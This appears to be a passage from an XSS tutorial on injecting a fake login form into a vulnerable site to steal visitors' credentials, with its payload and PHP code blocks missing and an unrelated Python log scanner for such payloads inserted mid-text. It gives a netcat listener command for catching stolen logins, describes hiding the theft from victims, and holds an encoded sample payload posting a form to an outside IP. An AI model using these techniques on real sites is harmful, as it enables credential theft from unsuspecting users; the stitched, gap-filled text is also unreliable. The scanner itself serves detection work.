A common XSS attack is to inject a fake login form that sends the entered login details to the attacker's server.
Minified payload with document.write():
Let's say the website originally provides a URL form like this:
We might want to remove that URL form if it doesn't fit our phishing page. We can get rid of it with the remove() function:
Once we add this code to the previous JavaScript (after the document.write call), we can use the new JavaScript in our payload:
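Added example, not part of the original write-up: a small Python scanner that flags the fake-login-form payload described above in web-server access logs, by URL-decoding each request and looking for document.write(), a removed form, and an injected <form> whose action points off-site. The site hostname, log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlparse

# Hypothetical origin of the protected app (an assumption for this example);
# an injected <form> whose action points anywhere else is treated as exfiltration.
SITE_HOST = "app.example.test"

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
FORM_ACTION_RE = re.compile(r'<form[^>]*\baction\s*=\s*["\']?([^"\'\s>]+)', re.I)

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=laptop HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=document.write+tutorial HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=%3Cscript%3Edocument.write%28%27%3Cform%20action%3D%22http%3A%2F%2F203.0.113.5%2F%22%3E%27%29%3C%2Fscript%3E HTTP/1.1" 200 900
"""

def decode_request_path(log_line):
    """Extract the request target; decode twice to also catch double-encoded input."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    return unquote_plus(unquote_plus(m.group(1)))

def classify_request(decoded_path):
    """Return the indicators found in one decoded request: the page rewritten with
    document.write(), the site's own form removed, and a form posting off-site."""
    hits = []
    low = decoded_path.lower()
    if "document.write" in low:
        hits.append("document.write")
    if re.search(r"\.remove\s*\(", low):
        hits.append("element.remove()")
    for action in FORM_ACTION_RE.findall(decoded_path):
        host = urlparse(action).hostname
        if host and host.lower() != SITE_HOST:
            hits.append(f"offsite form action -> {host}")
    return hits

def scan_log(text):
    """Return (client_ip, indicators) for lines carrying two or more indicators,
    so a lone mention of document.write in a search query does not alert."""
    findings = []
    for line in text.splitlines():
        decoded = decode_request_path(line)
        if decoded is not None:
            hits = classify_request(decoded)
            if len(hits) >= 2:
                findings.append((line.split()[0], hits))
    return findings
```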
Credential Stealing
We can use netcat for this:
sudo nc -lvnp 80
But this won't handle the HTTP request correctly, and the victim would get an "Unable to connect" error.
We can use a PHP script instead to log the credentials and return the original page to the victim. In that case the victim may not notice anything unusual.
The following code should work:
Let's save the code above as index.php and place it inside /tmp/tmpserver.
Now that index.php is ready, let's start the PHP listening server: